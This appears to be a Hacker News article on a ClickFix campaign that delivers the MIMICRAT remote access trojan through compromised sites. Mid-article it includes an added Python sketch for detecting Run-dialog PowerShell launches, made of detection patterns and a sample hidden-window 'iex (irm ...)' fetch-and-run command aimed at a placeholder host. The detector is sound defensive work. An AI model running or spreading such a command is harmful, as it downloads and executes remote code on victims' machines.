ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware - The Hacker News
Ravie Lakshmanan | Feb 20, 2026 | Malware / Threat Intelligence
Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT).
"The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic," Elastic Security Labs said in a Friday report.
According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. The campaign was discovered earlier this month.
It's also assessed to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT. The end goal of the attack is suspected to be ransomware deployment or data exfiltration.
In the infection sequence highlighted by Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code that's responsible for loading an externally hosted PHP script. The PHP script then proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue.
This, in turn, leads to the execution of a PowerShell command, which then contacts a command-and-control (C2) server to fetch a second-stage PowerShell script that patches Windows event logging (Event Tracing for Windows, ETW) and antivirus scanning (Antimalware Scan Interface, AMSI) before dropping a Lua-based loader. In the final stage, the Lua script decrypts and executes shellcode in memory, which in turn delivers MIMICRAT.
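For defenders, the first stage described above leaves a recognizable process-creation trace: a command pasted into the Run dialog starts PowerShell as a child of explorer.exe. The sketch below is an added example, not code from Elastic's report or from this article; it assumes Sysmon Event ID 1 field names, and the sample events and indicator patterns are constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation records (Sysmon Event ID 1 field names assumed).
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://stage.example.invalid/a)"'},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": 'pwsh -c "Invoke-WebRequest https://intranet.example.invalid/health"'},
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad iex-notes.txt"},
]

SHELLS = {"powershell.exe", "pwsh.exe"}
# Illustrative command-line traits of a fetch-and-run one-liner (assumed, not IoCs).
INDICATORS = {
    "hidden_window": re.compile(r"\s-w\w*\s+(hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e\w*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "web_fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def clickfix_hits(event):
    """Return matched indicator names when explorer.exe spawned PowerShell, else []."""
    parent = basename(event["ParentImage"]).lower()
    image = basename(event["Image"]).lower()
    if parent != "explorer.exe" or image not in SHELLS:
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]

def detect(events):
    """Map event id -> indicators for events worth an analyst's attention."""
    hits = {ev["id"]: clickfix_hits(ev) for ev in events}
    return {event_id: names for event_id, names in hits.items() if names}

if __name__ == "__main__":
    for event_id, names in detect(SAMPLE_EVENTS).items():
        print(f"event {event_id}: Run-dialog style PowerShell launch, indicators={names}")
```

A bare PowerShell launch from the Run dialog (event 2) and a service-launched script that fetches a URL (event 3) are not flagged; only the combination of parent process and command-line traits is.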
The Trojan uses HTTPS for communicating with the C2 server, allowing it to accept two dozen commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling.
"The campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach," security researcher Salim Bitam said. "Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting."